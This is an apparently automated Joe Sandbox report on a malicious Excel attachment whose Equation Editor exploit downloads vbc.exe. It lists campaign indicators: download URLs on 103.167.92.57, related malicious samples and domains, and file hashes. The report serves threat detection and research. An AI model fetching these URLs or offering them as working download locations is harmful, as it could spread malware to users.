                                      		16527GVTCINTERNETUStrue
                                      103.167.92.57
                                      		unknownunknown
                                      		7575AARNET-AS-APAustralianAcademicandResearchNetworkAARNetrue

                                      General Information

                                      Joe Sandbox Version:34.0.0 Boulder Opal
                                      Analysis ID:562488
                                      Start date:28.01.2022
                                      Start time:22:46:19
                                      Joe Sandbox Product:CloudBasic
                                      Overall analysis duration:0h 12m 4s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Sample file name:Vecchio debito_SKTGH_465585484754.xlsx
                                      Cookbook file name:defaultwindowsofficecookbook.jbs
                                      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                      Number of analysed new started processes analysed:12
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:1
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • HDC enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Detection:MAL
                                      Classification:mal100.troj.expl.evad.winXLSX@9/20@4/4
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HDC Information:
                                      • Successful, ratio: 29.4% (good quality ratio 27.9%)
                                      • Quality average: 70.4%
                                      • Quality standard deviation: 29.6%
                                      HCA Information:
                                      • Successful, ratio: 99%
                                      • Number of executed functions: 120
                                      • Number of non-executed functions: 25
                                      Cookbook Comments:
                                      • Adjust boot time
                                      • Enable AMSI
                                      • Found application associated with file extension: .xlsx
                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                      • Attach to Office via COM
                                      • Scroll down
                                      • Close Viewer

                                      Warnings

                                      • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size getting too big, too many NtCreateFile calls found.
                                      • Report size getting too big, too many NtEnumerateValueKey calls found.
                                      • Report size getting too big, too many NtQueryAttributesFile calls found.

                                      Simulations

                                      Behavior and APIs

                                      TimeTypeDescription
                                      22:46:38API Interceptor95x Sleep call for process: EQNEDT32.EXE modified
                                      22:46:43API Interceptor74x Sleep call for process: vbc.exe modified
                                      22:47:09API Interceptor228x Sleep call for process: cscript.exe modified
                                      22:47:56API Interceptor1x Sleep call for process: explorer.exe modified

                                      Joe Sandbox View / Context

                                      IPs

                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                      162.241.244.46fkOdqDZAvp.exeGet hashmaliciousBrowse
                                      • www.dairatwsl.com/yrcy/?VZw8ZH=e/RF5Wkqcp2gDqcx0hYVOLL0JiY85m+wPQj2VCJgE7kNJ78HHCBTXY9Fv/5/2QDF4Xpz&n2=-Zi8spbPU2m8SP
                                      DJEu0gCilD.exeGet hashmaliciousBrowse
                                      • www.dairatwsl.com/yrcy/?r0Gpex=e/RF5Wkqcp2gDqcx0hYVOLL0JiY85m+wPQj2VCJgE7kNJ78HHCBTXY9Fv/5VpgzF8Vhz&P8Mpf=7ni8
                                      206.188.192.25iZdSBJJ91.exeGet hashmaliciousBrowse
                                      • www.laqueenbeautybar.supplies/yrcy/?8p=v3r6hW9+z4ZKftfPfHCkxkGayxrL9igaQBoieRcbI1PMpPYN3lExnvFQcA3oi3yZJbM9&Wl=JFQDTZs0fFu4
                                      LLC Aztrade Baku Order .xlsxGet hashmaliciousBrowse
                                      • www.laqueenbeautybar.supplies/yrcy/?m4c=v3r6hW97z/ZOf9TDdHCkxkGayxrL9igaQBwyCSAaMVPNp+0Lw1V9xr9SflbU5XGqGaZNIw==&ShdpFx=mL04in80b68
                                      lBpxJoOTRL.exeGet hashmaliciousBrowse
                                      • www.laqueenbeautybar.supplies/yrcy/?8phLk=v3r6hW9+z4ZKftfPfHCkxkGayxrL9igaQBoieRcbI1PMpPYN3lExnvFQcA3oi3yZJbM9&zPODYf=6lIDg8lhZTn
                                      hMeeq0pJVA.exeGet hashmaliciousBrowse
                                      • www.laqueenbeautybar.supplies/yrcy/?5j3Py2n=v3r6hW9+z4ZKftfPfHCkxkGayxrL9igaQBoieRcbI1PMpPYN3lExnvFQcDbSh2eiKstsRH8ZVw==&K0DLW2=p6AhurgPP
                                      216.177.167.5fDjoJSlUGW.exeGet hashmaliciousBrowse
                                      • www.hevenorfeed.com/yrcy/?5juXff=H+0J8LItM7xENSiQ3KZRmbjixQokhoGpIP8AdHPNVnryr6B3SrDCaNsZZihSUG1hJffg&q6zH=NFQTAv802
                                      103.167.92.57MBGGS_Order_3746745855835.xlsxGet hashmaliciousBrowse
                                      • 103.167.92.57/googleCRC/vbc.exe
                                      Re Nuovo ordine.xlsxGet hashmaliciousBrowse
                                      • 103.167.92.57/intelRfd/vbc.exe
                                      New Order.xlsxGet hashmaliciousBrowse
                                      • 103.167.92.57/glcouldB2/vbc.exe
                                      LLC Aztrade Baku Order .xlsxGet hashmaliciousBrowse
                                      • 103.167.92.57/couldA9/vbc.exe
                                      Oferta SECGH.xlsxGet hashmaliciousBrowse
                                      • 103.167.92.57/gcould/vbc.exe
                                      INDA_SKGGCPL75787657 .xlsxGet hashmaliciousBrowse
                                      • 103.167.92.57/intel087(R)/vbc.exe
                                      SKGHCCMAidbki_pri.xlsxGet hashmaliciousBrowse
                                      • 103.167.92.57/intel(R)/vbc.exe
                                      SKGHCCMAidbki_pri.xlsxGet hashmaliciousBrowse
                                      • 103.167.92.57/intel(R)/vbc.exe
                                      DucMarblesTiles_467453 Order.xlsxGet hashmaliciousBrowse
                                      • 103.167.92.57/intelpro/vbc.exe
                                      New Order.xlsxGet hashmaliciousBrowse
                                      • 103.167.92.57/oswindows10pro/vbc.exe
                                      DHLExpress.xlsxGet hashmaliciousBrowse
                                      • 103.167.92.57/winos11pro/vbc.exe
                                      shipping_doc_0000000020122021.xlsxGet hashmaliciousBrowse
                                      • 103.167.92.57/h0000p1@/vbc.exe
                                      PO.xlsxGet hashmaliciousBrowse
                                      • 103.167.92.57/021mscloud___wp/vbc.exe
                                      SKM6197534BT New Order.xlsxGet hashmaliciousBrowse
                                      • 103.167.92.57/wp23mscloud___/vbc.exe
                                      NBK Swift .xlsxGet hashmaliciousBrowse
                                      • 103.167.92.57/____20388__0055/vbc.exe
                                      Payment Swift .xlsxGet hashmaliciousBrowse
                                      • 103.167.92.57/____00925_1529/vbc.exe
                                      #U03a0#U03c1#U03bf#U03c3#U03c6#U03bf#U03c1#U03ac_367464.xlsxGet hashmaliciousBrowse
                                      • 103.167.92.57/11d55_mscloud_qq00/vbc.exe
                                      New Order Bellafruits.xlsxGet hashmaliciousBrowse
                                      • 103.167.92.57/cloudms_890_1254/vbc.exe
                                      Bidamedpharm Order 244734744244557673.xlsxGet hashmaliciousBrowse
                                      • 103.167.92.57/mpy_cv_209_4780/vbc.exe
                                      Bidamedipharms Order.xlsxGet hashmaliciousBrowse
                                      • 103.167.92.57/re_cv_9088_6001/vbc.exe

                                      Domains

                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                      www.hevenorfeed.com6ApB6wpF8f.exeGet hashmaliciousBrowse
                                      • 216.177.167.5
                                      fDjoJSlUGW.exeGet hashmaliciousBrowse
                                      • 216.177.167.5
                                      www.laqueenbeautybar.supplies5iZdSBJJ91.exeGet hashmaliciousBrowse
                                      • 206.188.192.2
                                      LLC Aztrade Baku Order .xlsxGet hashmaliciousBrowse
                                      • 206.188.192.2
                                      lBpxJoOTRL.exeGet hashmaliciousBrowse
                                      • 206.188.192.2
                                      hMeeq0pJVA.exeGet hashmaliciousBrowse
                                      • 206.188.192.2

                                      ASNs

                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                      UNIFIEDLAYER-AS-1USDeposit_Receipt.xlsxGet hashmaliciousBrowse
                                      • 162.241.169.207
                                      invoice doc.exeGet hashmaliciousBrowse
                                      • 192.185.111.245
                                      G.dllGet hashmaliciousBrowse
                                      • 162.214.50.39
                                      1162545482187818.xlsGet hashmaliciousBrowse
                                      • 162.214.50.39
                                      364453688149503140239183.xlsGet hashmaliciousBrowse
                                      • 162.214.50.39
                                      CJ68000754184.xlsGet hashmaliciousBrowse
                                      • 162.214.50.39
                                      imedpub_2.xlsGet hashmaliciousBrowse
                                      • 162.241.211.118
                                      imedpub_6.xlsGet hashmaliciousBrowse
                                      • 162.214.50.39
                                      imedpub.com_6.xlsGet hashmaliciousBrowse
                                      • 162.241.211.118
                                      imedpub.com_10.xlsGet hashmaliciousBrowse
                                      • 162.214.50.39
                                      iMedPub LTD_10.xlsGet hashmaliciousBrowse
                                      • 162.214.50.39
                                      iMedPub LTD_12.xlsGet hashmaliciousBrowse
                                      • 162.214.50.39
                                      iMedPub LTD_14.xlsGet hashmaliciousBrowse
                                      • 162.214.50.39
                                      NZW-010122 BNUV-280122.xlsmGet hashmaliciousBrowse
                                      • 162.214.50.39
                                      iMedPub LTD_15.xlsGet hashmaliciousBrowse
                                      • 162.241.211.118
                                      iMedPub LTD_2.xlsGet hashmaliciousBrowse
                                      • 162.241.211.118
                                      iMedPub LTD_3.xlsGet hashmaliciousBrowse
                                      • 162.241.211.118
                                      iMedPub LTD_7.xlsGet hashmaliciousBrowse
                                      • 162.214.50.39
                                      iMedPub LTD_8.xlsGet hashmaliciousBrowse
                                      • 162.241.211.118
                                      imedpub.xlsGet hashmaliciousBrowse
                                      • 162.214.50.39
                                      DEFENSE-NETUSNoua lista de comenzi.exeGet hashmaliciousBrowse
                                      • 206.188.193.90
                                      jvDX48oGKQdeYMi.exeGet hashmaliciousBrowse
                                      • 209.17.116.163
                                      5iZdSBJJ91.exeGet hashmaliciousBrowse
                                      • 206.188.192.2
                                      STATEMENT OF ACCOUNT.xlsxGet hashmaliciousBrowse
                                      • 209.17.116.163
                                      Proforma Fatura ektedir.exeGet hashmaliciousBrowse
                                      • 206.188.193.90
                                      PI02627625141.PDF.exeGet hashmaliciousBrowse
                                      • 206.188.193.90
                                      f5JeAxVVgx.exeGet hashmaliciousBrowse
                                      • 209.17.116.163
                                      Payment_pdf.exeGet hashmaliciousBrowse
                                      • 209.17.116.163
                                      E48V1NL0GX.exeGet hashmaliciousBrowse
                                      • 205.178.189.129
                                      LLC Aztrade Baku Order .xlsxGet hashmaliciousBrowse
                                      • 206.188.192.2
                                      81509562.exeGet hashmaliciousBrowse
                                      • 209.17.116.163
                                      ur2NHPuTBSGet hashmaliciousBrowse
                                      • 170.158.122.17
                                      GhEbenpQOuGet hashmaliciousBrowse
                                      • 170.158.122.41
                                      ODFkNglL18.exeGet hashmaliciousBrowse
                                      • 209.17.116.163
                                      QUOTATION REQUEST - SUPPLY OF PRODUCTS - DTD JANUARY 2022.xlsxGet hashmaliciousBrowse
                                      • 206.188.192.242
                                      BOSFA Pty -Project File - PRICE REQUEST Ref#93801994 Australia.xlsxGet hashmaliciousBrowse
                                      • 206.188.192.207
                                      scan doc_o1022111234.exeGet hashmaliciousBrowse
                                      • 209.17.116.163
                                      ceqpn0UYFJ.exeGet hashmaliciousBrowse
                                      • 209.17.116.163
                                      Payment Details USD 98,000.xlsxGet hashmaliciousBrowse
                                      • 209.17.116.163
                                      armGet hashmaliciousBrowse
                                      • 170.158.109.82

                                      JA3 Fingerprints

                                      No context

                                      Dropped Files

                                      No context

                                      Created / dropped Files

                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

                                      Download File
                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:downloaded
                                      Size (bytes):796672
                                      Entropy (8bit):6.405321787421746
                                      Encrypted:false
                                      SSDEEP:12288:wvEQ0OQo9yMBQXttUEHBZwxDn0876BblOyGNaS0ZXub:uj0zocjgEHoHoA4SWX
                                      MD5:A8F58E851A89075EE8AB92E5CB6A776C
                                      SHA1:DFAD7B60B5A3370700F32D20E35967EE60E859F6
                                      SHA-256:C9E510166EE89B61B67CC0646C60422E7F9C7D8C05101ECB2552D3EAB87DE758
                                      SHA-512:C14B600C8E7399291E8D104AE192603C6D25D063AD6A610E1F5AFAF708E08377FB8B17B9FBBAFC154FE071D31C170E7FE21F27F406A828C75B32426F2AAA7FE0
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      Reputation:low
                                      IE Cache URL:http://103.167.92.57/CRC/vbc.exe
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a............................^8... ...@....@.. ....................................@..................................8..K....`...............................7............................................... ............... ..H............text...d.... ...................... ..`.sdata.......@......................@....rsrc........`....... ..............@..@.reloc...............&..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2DB33C54.png

                                      Download File
                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                      File Type:PNG image data, 139 x 180, 8-bit colormap, non-interlaced
                                      Category:dropped
                                      Size (bytes):3747
                                      Entropy (8bit):7.932023348968795
                                      Encrypted:false
                                      SSDEEP:96:4apPN/1Cb2ItR9rXu7p6mtnOCRxMJZtFtQcgBF5c2SGA:1Pp1kRROtrRxSyRjST1
                                      MD5:5EB99F38CB355D8DAD5E791E2A0C9922
                                      SHA1:83E61CDD048381C86E3C3EFD19EB9DAFE743ADBA
                                      SHA-256:5DAC97FDBD2C2D5DFDD60BF45F498BB6B218D8BFB97D0609738D5E250EBBB7E0
                                      SHA-512:80F32B5740ECFECC5B084DF2C5134AFA8653D79B91381E62A6F571805A6B44D52D6FD261A61A44C33364123E191D974B87E3FEDC69E7507B9927936B79570C86
                                      Malicious:false
                                      Reputation:moderate, very likely benign file
                                      Preview:.PNG........IHDR.............../.....tEXtSoftware.Adobe ImageReadyq.e<...]PLTE............&f||}\\].........5G}..._l....778....................................................IDATx..]...<.nh........../)....;..~;.U..>.i.$..0*..QF@.)."..,.../._,.y,...z....c.wuI{.Xt.!f.%.!.!....X..<....)..X...K.....T.&h.U4.x.......*......v;.R.a..i.B.......A.T`.....v....N..u.........NG......e....}.4=."{.+.."..7.n....Qi5....4....(.....&.......e...].t...C'.eYFmT..1..CY.c.t.............G./.#..X....{.q.....A..|.N.i.<Y1.^>..j..Zlc....[<.z..HR......b..@.)..U...:-...9'.u. ..-sD..,.h....oo...8..M.8.*.4...........*.f..&X..V......#.BN..&>R.....&.Q.&A}Bl9.-.G.wd`.$...\.......5<..O.wuC....I.....<....(j.c,...%.9..'.....UDP.*@...#.XH.....<V...!.../...(<.../..,...l6u...R...:..t..t......m+....OI...........+X._..|S.x.6..W..../sK.}a..]EO..../....yY.._6..../U.Q.|Z,`.:r.Y.B...I.Z.H...f....SW..}.k.?.^.'..F....?*n1|.?./.....#~|.y.r.j..u.Z...).......F.,m.......6..&..8."o...^..8.B.w...R.\..R.

                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\36C7354D.jpeg

                                      Download File
                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 160x160, frames 3
                                      Category:dropped
                                      Size (bytes):4396
                                      Entropy (8bit):7.884233298494423
                                      Encrypted:false
                                      SSDEEP:96:1rQzp0lms5HqrrVflQ9MS5Bmy9CSKgpEfSgHk4oPQwb/BD+qSzAGW:1UF0EmEiSS3mKbbpDSk4oYwbBD+qKAX
                                      MD5:22FEC44258BA0E3A910FC2A009CEE2AB
                                      SHA1:BF6749433E0DBCDA3627C342549C8A8AB3BF51EB
                                      SHA-256:5CD7EA78DE365089DDDF47770CDECF82E1A6195C648F0DB38D5DCAC26B5C4FA5
                                      SHA-512:8ED1D2EE0C79AFAB19F47EC4DE880C93D5700DB621ACE07D82F32FA3DB37704F31BE2314A7A5B55E4913131BCA85736C9AC3CB5987BEE10F907376D76076E7CA
                                      Malicious:false
                                      Reputation:moderate, very likely benign file
                                      Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#............."...........................................................!1."AQa..q.#2R....BS.....$3Tb.4D%Crs................................................!R...AQa..1.."Sbq...............?....A.s..M...K.w.....E......!2.H...N.,E.+.i.z.!....-IInD..G....]L.u.R.lV...%aB.k.2mR.<..=."a.u...}},....:..C..I...A9w.....k.....>. .Gi......f.l...2..)..T...JT....a$t5..)..."... .. .. ....Gc..eS.$....6..._=.... d ....HF-.~.$s.9."T.nSF.pARH.@H..=y.B..IP."K$...u.h]*.#'zZ...2.hZ...K.K..b#s&...c@K.AO.*.}.6....\..i....."J..-.I/....c.R...f.I.$.....U.>..LNj..........G....wuF.5*...RX.9.-(D.[$..[...N%.29.W,...&i.Y6.:q.xi.......o...lJe.B.R+.&..a.m..1.$.,)5.)/..w.1......v.d..l...bB..JLj]wh.SK.L.....%S....NAI.)B7I.e..4.5...6......L.j...eW.=..u....#I...li..l....`R.o.<.......C.`L2...c...W..3.\...K...%.a..M.K.l.Ad...6).H?..2.Rs..3+.

                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\50F3279B.png

                                      Download File
                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                      File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
                                      Category:dropped
                                      Size (bytes):10202
                                      Entropy (8bit):7.870143202588524
                                      Encrypted:false
                                      SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
                                      MD5:66EF10508ED9AE9871D59F267FBE15AA
                                      SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
                                      SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
                                      SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
                                      Malicious:false
                                      Preview:.PNG........IHDR...............|.....sRGB.........gAMA......a.....pHYs..........o.d..'oIDATx^.k...u.D.R.b\J"Y.*.".d.|pq..2.r,.U.#.)F.K.n.).JI)."....T.....!.....`/H. ...\<...K...DQ"..]..(RI..>.s..t..w.>..U....>.....s/....1./^..p..........Z.H3.y..:..<..........[...@[.........Z.`E....Y:{.,.<y..x....O..................M....M........:..tx..*..........'o..kh.0./.3.7.V...@t........x......~...A.?w....@...A]h.0./.N..^,h......D.....M..B..a}a.a.i.m...D.....M..B..a}a.a.........A]h.0.....P41..-........&.!...!.x......(.......e..a :.+.|.Ut.U_..........2un......F7[.z.?...&..qF}.}..]I...+..J.w.~Aw....V..-.....B, W.5..P.y....>[.....q.t.6U<..@.....qE9.nT.u...`..AY.?...Z<.D.t...HT..A.....8.)..M...k\...v...`..A..?.N.Z<.D.t.Htn.O.sO...0..wF...W.#H...!p....h...|.V+Kws2/......W*....Q.,...8X.)c...M..H.|.h.0....R...Mg!...B...x..;....Q..5........m.;.Q./9..e"{Y.P..1x...FB!....C.G.......41.........@t@W......B/.n.b...w..d....k'E..&..%l.4SBt.E?..m...eb*?.....@.....a :.+H...Rh..

                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\537A6982.png

                                      Download File
                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                      File Type:PNG image data, 150 x 150, 8-bit/color RGBA, non-interlaced
                                      Category:dropped
                                      Size (bytes):5396
                                      Entropy (8bit):7.915293088075047
                                      Encrypted:false
                                      SSDEEP:96:f8W/+DRQgDhhXoFGUAAX5QLwh9eDYfaiy3cHIOZ7NLXgGFMtu4vPWY1TIwD4i:f8agQgDhhXoFGUP2Lwh98YfaxcHIOPLo
                                      MD5:590B1C3ECA38E4210C19A9BCBAF69F8D
                                      SHA1:556C229F539D60F1FF434103EC1695C7554EB720
                                      SHA-256:E26F068512948BCE56B02285018BB72F13EEA9659B3D98ACC8EEBB79C42A9969
                                      SHA-512:481A24A32C9D9278A8D3C7DB86CAC30303F11C8E127C3BB004B9D5E6EDDF36830BF4146E35165DF9C0D0FB8C993679A067311D2BA3713C7E0C22B5470862B978
                                      Malicious:false
                                      Preview:.PNG........IHDR.............<.q.....IDATx..Yo.......}.B.Z-9.";r..F..A..h....)z.~.~. .M......ia..]'Qc[ri.Dm.%R.>.9..S[.B....yn$.y.yg...9.y.{..i.t..ix<.N.....Z......}.H..A.o..[..\Gm..a....er.m....f!....$133..."...........R..h4.x.^.Earr.?..O..qz{{..........322...@Gm..y.?~L2..Z...:....0p..x<..n7.p.z..G....@.uVVV....t....x.vH<...h...J...h.(..a...O>.GUU....|.2..\ ..........p....q..P..............(.....0p.\<~..x<...2.d...E..:.H.+.7..y...n.&.i"I.{.8..-..o......q.fX.G....... .%.....f.........=.(.|>.....===<x....!L.$..R.........:.....Bww7.h...E.^G.e.^/..R(.H$....TU%...v._.]..ID....N'..=bdd..7oR..i6...a..4g.....B.@&......|>...?299I&.!....:....nW.4...?......|..G..I....+......@WW..J.d2.......&.J155u.s>..K....iw.@..C.$<.....H$...D.4...... ....Fy..!.x....W_}.O..S<...D...UUeii.d2.....T...O.Z.X,.....j..nB....Q..p8..R..>.N..j....eg.....V.....Q.h4.....$I"...u..m.!.... ..1*...6.>.....,....xP......\.c.&.x.B.@$.!.Ju4.z.y..1.f.T*.$I.J%....u.......qL.P(..F.......*....\....^..

                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\549B41E3.png

                                      Download File
                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                      File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                                      Category:dropped
                                      Size (bytes):11303
                                      Entropy (8bit):7.909402464702408
                                      Encrypted:false
                                      SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                                      MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                                      SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                                      SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                                      SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                                      Malicious:false
                                      Preview:.PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....

                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5BDF62EA.png

                                      Download File
                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                      File Type:PNG image data, 139 x 180, 8-bit colormap, non-interlaced
                                      Category:dropped
                                      Size (bytes):3747
                                      Entropy (8bit):7.932023348968795
                                      Encrypted:false
                                      SSDEEP:96:4apPN/1Cb2ItR9rXu7p6mtnOCRxMJZtFtQcgBF5c2SGA:1Pp1kRROtrRxSyRjST1
                                      MD5:5EB99F38CB355D8DAD5E791E2A0C9922
                                      SHA1:83E61CDD048381C86E3C3EFD19EB9DAFE743ADBA
                                      SHA-256:5DAC97FDBD2C2D5DFDD60BF45F498BB6B218D8BFB97D0609738D5E250EBBB7E0
                                      SHA-512:80F32B5740ECFECC5B084DF2C5134AFA8653D79B91381E62A6F571805A6B44D52D6FD261A61A44C33364123E191D974B87E3FEDC69E7507B9927936B79570C86
                                      Malicious:false
                                      Preview:.PNG........IHDR.............../.....tEXtSoftware.Adobe ImageReadyq.e<...]PLTE............&f||}\\].........5G}..._l....778....................................................IDATx..]...<.nh........../)....;..~;.U..>.i.$..0*..QF@.)."..,.../._,.y,...z....c.wuI{.Xt.!f.%.!.!....X..<....)..X...K.....T.&h.U4.x.......*......v;.R.a..i.B.......A.T`.....v....N..u.........NG......e....}.4=."{.+.."..7.n....Qi5....4....(.....&.......e...].t...C'.eYFmT..1..CY.c.t.............G./.#..X....{.q.....A..|.N.i.<Y1.^>..j..Zlc....[<.z..HR......b..@.)..U...:-...9'.u. ..-sD..,.h....oo...8..M.8.*.4...........*.f..&X..V......#.BN..&>R.....&.Q.&A}Bl9.-.G.wd`.$...\.......5<..O.wuC....I.....<....(j.c,...%.9..'.....UDP.*@...#.XH.....<V...!.../...(<.../..,...l6u...R...:..t..t......m+....OI...........+X._..|S.x.6..W..../sK.}a..]EO..../....yY.._6..../U.Q.|Z,`.:r.Y.B...I.Z.H...f....SW..}.k.?.^.'..F....?*n1|.?./.....#~|.y.r.j..u.Z...).......F.,m.......6..&..8."o...^..8.B.w...R.\..R.

                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5CFCF9D6.png

                                      Download File
                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                      File Type:PNG image data, 139 x 180, 8-bit colormap, non-interlaced
                                      Category:dropped
                                      Size (bytes):2647
                                      Entropy (8bit):7.8900124483490135
                                      Encrypted:false
                                      SSDEEP:48:H73wCcD5X+ajENpby1MTln0V1oPd8V8EAWG09tXIa1iBINm4YwFi9:H73KAajQPiMWJG08a1qINm4jU9
                                      MD5:E46357D82EBC866EEBDA98FA8F94B385
                                      SHA1:76C27D89AB2048AE7B56E401DCD1B0449B6DDF05
                                      SHA-256:B77A19A2F45CBEE79DA939F995DBD54905DED5CB31E7DB6A6BE40A7F6882F966
                                      SHA-512:8EC0060D1E4641243844E596031EB54EE642DA965078B5A3BC0B9E762E25D6DF6D1B05EACE092BA53B3965A29E3D34387A5A74EB3035D1A51E8F2025192468F3
                                      Malicious:false
                                      Preview:.PNG........IHDR.............../....EPLTE.......................o...ttu`aaLML.s;.../-,................~_)$....IDATx..].b.*....Y\.....o..4...bl.6.1...Y.".|.2A@y.../...X.X..X..2X.........o.Xz}go.*m..UT.DK...ukX.....t.%..iB......w.j.1].].m....._)T...Z./.%.tm..Eq...v...wNX@.I..'$CS:e.K.Un.U.v......*.P.j. .5.N.5,..B]....y..2!..^.?...5..A...>"....)...}.*.....{[e4(.Nn....x.,....t.1..6.....}K).$.I.%n$b..G.g.w.....M..w..B.......tF".YtI..C.s.~)..<@"......-..._.(x...b..C..........;5.=.......c...s.....>.E;g.#.hk.Q..g,o;Z`.$.p&.8..ia...La....~XD.4p...8......HuYw.~X.+&Q.a.H.C..ly..X..a.?O.yS,C.r..........Xbp&.D..1.....c.cp..G.....L.M..2..5...4..L.E..`.`9...@...A.....A.E;...YFN.A.G.8..>aI.I.,...K..t..].FZ...E..F....Do../.d.,..&.f.e!..6.......2.;..gNqH`...X..\...AS...@4...#.....!D}..A_....1.W..".S.A.HIC.I'V...2..~.O.A}N........@K.B./...J,.E.....[`I>.F....$v$...:,..H..K.om.E..S29kM/..z.W...hae..62z%}y..q..z...../M.X..)....B eC..........x.C.42u...W...7.7.7

                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\74ED78E9.png

                                      Download File
                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                      File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
                                      Category:dropped
                                      Size (bytes):10202
                                      Entropy (8bit):7.870143202588524
                                      Encrypted:false
                                      SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
                                      MD5:66EF10508ED9AE9871D59F267FBE15AA
                                      SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
                                      SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
                                      SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
                                      Malicious:false
